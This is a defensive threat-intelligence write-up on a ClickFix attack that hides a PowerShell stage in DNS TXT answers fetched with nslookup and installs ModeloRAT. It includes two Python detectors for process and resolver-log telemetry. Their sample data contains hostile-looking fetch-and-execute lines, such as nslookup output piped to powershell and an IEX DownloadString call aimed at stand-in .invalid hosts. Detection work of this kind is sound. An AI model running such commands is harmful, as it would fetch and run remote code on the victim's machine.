Executive Summary
In February 2026, a new variant of the ClickFix social engineering attack emerged that used DNS responses, rather than a web download, to deliver its first-stage payload. Victims were talked into pasting a command into the Windows Run dialog; the command invoked the built-in 'nslookup' tool against an attacker-controlled DNS server, and the record returned carried a PowerShell script that was then executed. That script pulled down further components and ultimately installed the remote access trojan ModeloRAT. Because the first stage arrived inside a DNS answer, it never passed through web proxies or URL filtering, and the lookup itself blended into normal DNS traffic.
What is new here is the carrier, not the lure: ClickFix already relied on users running commands by hand, but putting the stage in a DNS record sidesteps the web-layer controls most organizations depend on. The practical consequences are to monitor DNS answers (not only queries) for script-like content, to restrict which resolvers endpoints may talk to, and to teach users that no legitimate support or verification flow asks them to paste commands into the Run dialog.
Why This Matters Now
The exploitation of DNS queries in ClickFix attacks represents a significant evolution in cyber threats, making it imperative for organizations to enhance their security protocols and user training to prevent such sophisticated social engineering tactics.
Attack Path Analysis
The attack began with a social engineering tactic where victims were deceived into executing a malicious command via the Windows Run dialog, initiating a DNS query to an attacker-controlled server. This query returned a response containing a PowerShell script, which was executed to download additional malware, including a Python runtime and scripts for reconnaissance. The malware established persistence by creating startup entries and ultimately deployed ModeloRAT, a remote access trojan, granting attackers control over the compromised system.
Kill Chain Progression
Initial Compromise
Description
Victims were tricked into running a command that performed a DNS lookup to an attacker-controlled server, retrieving and executing a malicious PowerShell script.
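As an added example (not code from the original report, from Microsoft, or from any of the sources listed below), the following Python scores process-creation telemetry for this initial-compromise pattern. It assumes Sysmon Event ID 1 style fields (parent image, image, command line, user), that the Run dialog launches its child under explorer.exe, and that the nslookup output is handed to a script interpreter; the exact command-line shapes, hostnames and users in the sample events are constructed.

```python
import re
from dataclasses import dataclass

# Added example, not from the original report or Microsoft's write-up.
# Scores process-creation telemetry (Sysmon Event ID 1 / Windows 4688 style
# fields) for the ClickFix-via-nslookup pattern: a lookup tool or shell
# launched from the Run dialog (parent explorer.exe), asking for TXT records,
# with the answer fed to a script interpreter. The command-line shape is an
# assumption; the page only says the Run-dialog command triggered the lookup.


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


# The Run dialog (Win+R) spawns its child under explorer.exe.
RUN_DIALOG_PARENTS = {"explorer.exe"}
LOOKUP_OR_SHELL = {"nslookup.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# nslookup accepts -type=, -q= and -querytype= for the record type.
TXT_QUERY = re.compile(r"-(?:type|q|querytype)\s*=\s*txt\b", re.IGNORECASE)
# nslookup output piped into an interpreter or Invoke-Expression (assumed shape).
LOOKUP_PIPED_TO_INTERPRETER = re.compile(
    r"nslookup\b[^|]*\|\s*(?:powershell|pwsh|iex|invoke-expression)\b",
    re.IGNORECASE,
)
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return an integer score and the reasons that contributed to it."""
    score, reasons = 0, []
    if _basename(ev.image) in LOOKUP_OR_SHELL and _basename(ev.parent_image) in RUN_DIALOG_PARENTS:
        score += 2
        reasons.append("lookup tool or shell launched from explorer.exe (Run dialog)")
    if TXT_QUERY.search(ev.command_line):
        score += 3
        reasons.append("TXT record query")
    if LOOKUP_PIPED_TO_INTERPRETER.search(ev.command_line):
        score += 4
        reasons.append("nslookup output piped into an interpreter")
    if IEX.search(ev.command_line):
        score += 1
        reasons.append("Invoke-Expression present")
    return score, reasons


def detect(events, threshold: int = 5):
    """Events scoring at or above threshold are returned with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample telemetry; hostnames use reserved .invalid names and a
# documentation-range IP, nothing here is a real indicator.
SAMPLE_EVENTS = [
    # ClickFix-style Run dialog command: cmd wraps nslookup and pipes to powershell.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd /c "nslookup -type=txt stage.example.invalid 192.0.2.53 | powershell -nop -"', "CORP\\alice"),
    # Variant that stays inside PowerShell and feeds the answer to iex.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -nop -w hidden -c "nslookup -q=txt lookup.example.invalid | iex"', "CORP\\bob"),
    # Admin checking MX records from an interactive console: no TXT, no pipe.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\nslookup.exe",
                 "nslookup -type=mx example.com", "CORP\\admin"),
    # Mail-hygiene script reading SPF: TXT query, but scripted parent and no interpreter pipe.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\nslookup.exe",
                 "nslookup -type=txt example.com", "NT AUTHORITY\\SYSTEM"),
]

if __name__ == "__main__":
    for ev, score, reasons in detect(SAMPLE_EVENTS):
        print(f"[{score}] {ev.user}: {ev.command_line}")
        for r in reasons:
            print("   -", r)
```

The scoring is deliberately additive so that a TXT lookup on its own (common in mail-hygiene tooling) stays below the alert threshold, while the combination of an explorer.exe parent, a TXT query and a pipe into an interpreter clears it; tune the weights against your own baseline before deploying.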
MITRE ATT&CK® Techniques
User Execution: Malicious Copy and Paste (T1204.004) - the victim pastes the command into the Run dialog; no file is opened
Application Layer Protocol: DNS (T1071.004)
Command and Scripting Interpreter: PowerShell (T1059.001)
Command and Scripting Interpreter: Windows Command Shell (T1059.003)
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)
System Information Discovery (T1082)
Ingress Tool Transfer (T1105)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Malicious Software Prevention
Control ID: 6.4.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – User Training and Awareness
Control ID: 3.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of this incident, including operational, regulatory, and cloud security risks.
Financial Services
ClickFix DNS-based social engineering attacks threaten customer financial data through PowerShell malware delivery, bypassing traditional web security controls and enabling credential theft.
Information Technology/IT
DNS-based ClickFix attacks exploit IT infrastructure trust relationships, delivering ModeloRAT malware through legitimate nslookup commands while evading network security monitoring systems.
Computer Software/Engineering
Social engineering attacks targeting software developers through malicious DNS responses compromise source code repositories and development environments via PowerShell-based remote access trojans.
Health Care / Life Sciences
ClickFix DNS attacks threaten HIPAA compliance by installing reconnaissance malware that can access patient data systems through compromised administrative workstations.
Sources
- New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNS (BleepingComputer): https://www.bleepingcomputer.com/news/security/new-clickfix-attack-abuses-nslookup-to-retrieve-powershell-payload-via-dns/
- Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging (The Hacker News): https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
- CrashFix: Malicious NexShield Chrome Extension Forces Users To Install ModeloRAT Via PowerShell (CyberSecureFox): https://cybersecurefox.com/en/crashfix-nexshield-chrome-extension-modelorat-attack/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to move laterally and exfiltrate data by enforcing strict segmentation and identity-aware policies.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: A network fabric cannot stop a user from running a pasted command on the endpoint, but DNS and egress policy enforced in the fabric can keep the lookup from reaching the attacker's resolver and the stage from being retrieved, constraining the initial compromise.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges and establish persistence would likely be constrained, reducing the risk of further compromise.
Control: East-West Traffic Security
Mitigation: The attacker's ability to move laterally within the network would likely be constrained, reducing the risk of further compromise.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish and maintain command and control channels would likely be constrained, reducing the risk of remote control over compromised systems.
Control: Egress Security & Policy Enforcement
Mitigation: The attacker's ability to exfiltrate data would likely be constrained, reducing the risk of data loss.
The attacker's ability to cause significant impact would likely be constrained, reducing the risk of data theft, system manipulation, or further malware deployment.
Impact at a Glance
Affected Business Functions
- IT Operations
- Network Security
- Endpoint Management
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of sensitive corporate data due to remote access capabilities of ModeloRAT.
Recommended Actions
Key Takeaways & Next Steps
- Inspect DNS answers, not only queries: alert on TXT responses that carry script-like content, and force endpoints through resolvers you log and control so that lookups to arbitrary external servers fail.
- Enforce strict egress filtering: permit outbound DNS (UDP/TCP 53, and DoH/DoT where clients support it) only to approved resolvers and limit other outbound traffic, so that follow-on downloads and command-and-control sessions to attacker infrastructure are blocked.
- Use zero trust segmentation to limit lateral movement by restricting communication between workloads based on identity and policy.
- Monitor endpoint telemetry for the Run-dialog pattern: nslookup, cmd.exe or powershell.exe spawned from explorer.exe with a TXT query whose output is fed to a script interpreter, followed by new Run key or Startup folder entries.
- Educate users on ClickFix-style lures: no legitimate "fix", update or verification step requires pasting a command into the Run dialog.
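The first action is where a detection engineer can do concrete work. As an added example (not from the original report or its sources), the following Python triages TXT answers in resolver logs for script-like content while keeping known legitimate record types (SPF, DKIM, DMARC, site verification) from raising alerts. The log layout, field order and keyword list are assumptions, and the sample lines are constructed.

```python
import math
import re

# Added example, not from the original report. It triages TXT answers in
# resolver logs for the pattern described above: a PowerShell stage hidden in a
# DNS response. Log layout, field names and the keyword list are assumptions.

# Common legitimate TXT record prefixes; DKIM keys in particular are long
# base64 blobs and would otherwise trip the entropy and base64 checks.
KNOWN_BENIGN_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1", "google-site-verification=", "ms=")
# Tokens you would expect in a PowerShell download-and-execute stage (assumed list).
SCRIPT_TOKENS = re.compile(
    r"powershell|pwsh|\biex\b|invoke-expression|-enc(?:odedcommand)?\b|frombase64string|"
    r"downloadstring|net\.webclient|invoke-webrequest|start-process",
    re.IGNORECASE,
)
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def shannon_entropy(s: str) -> float:
    """Bits per character; plain text sits around 3-4, base64 blobs higher."""
    if not s:
        return 0.0
    n = len(s)
    counts = {c: s.count(c) for c in set(s)}
    return -sum(k / n * math.log2(k / n) for k in counts.values())


def score_txt_answer(answer: str) -> tuple[int, list[str]]:
    """Score one TXT RDATA string; higher means more likely a script stage."""
    text = answer.strip().strip('"')
    if text.lower().startswith(KNOWN_BENIGN_PREFIXES):
        return 0, ["known record type"]
    score, reasons = 0, []
    if SCRIPT_TOKENS.search(text):
        score += 4
        reasons.append("script/download keyword")
    if BASE64_RUN.search(text):
        score += 2
        reasons.append("long base64-looking run")
    if len(text) > 200:
        score += 1
        reasons.append("unusually long TXT answer")
    if shannon_entropy(text) > 4.5:
        score += 1
        reasons.append("high entropy")
    return score, reasons


def parse_log_line(line: str) -> dict:
    """Tab-separated: timestamp, client, qname, qtype, rcode, answer (assumed layout)."""
    ts, client, qname, qtype, rcode, answer = line.rstrip("\n").split("\t", 5)
    return {"ts": ts, "client": client, "qname": qname, "qtype": qtype, "rcode": rcode, "answer": answer}


def triage(lines, threshold: int = 4):
    """Return (record, score, reasons) for answered TXT queries at or above threshold."""
    hits = []
    for line in lines:
        rec = parse_log_line(line)
        if rec["qtype"] != "TXT" or rec["rcode"] != "NOERROR":
            continue
        score, reasons = score_txt_answer(rec["answer"])
        if score >= threshold:
            hits.append((rec, score, reasons))
    return hits


# Constructed resolver log lines; the payload strings are illustrative, not real samples.
SAMPLE_LOG = [
    '2026-02-10T09:11:58Z\t10.0.4.21\texample.com\tTXT\tNOERROR\t"v=spf1 include:_spf.example.com ~all"',
    '2026-02-10T09:12:01Z\t10.0.4.21\tsel1._domainkey.example.com\tTXT\tNOERROR\t'
    '"v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCabc123QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"',
    '2026-02-10T09:12:03Z\t10.0.4.21\tstage.example.invalid\tTXT\tNOERROR\t'
    '"powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString(\'http://dl.example.invalid/s\'))"',
    '2026-02-10T09:12:04Z\t10.0.4.22\tlookup.example.invalid\tTXT\tNOERROR\t'
    '"powershell -nop -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5YWJjZGVmZ2hpamts"',
    '2026-02-10T09:12:09Z\t10.0.4.30\texample.org\tTXT\tNOERROR\t"google-site-verification=abcDEF123"',
    '2026-02-10T09:12:11Z\t10.0.4.30\tmissing.example.invalid\tTXT\tNXDOMAIN\t""',
]

if __name__ == "__main__":
    for rec, score, reasons in triage(SAMPLE_LOG):
        print(f"[{score}] {rec['client']} -> {rec['qname']}: {', '.join(reasons)}")
```

The benign-prefix check comes first on purpose: without it, every DKIM selector lookup in the estate would score on length, entropy and base64 and drown the real hits. Extend KNOWN_BENIGN_PREFIXES with whatever verification records your own domains publish before relying on the threshold.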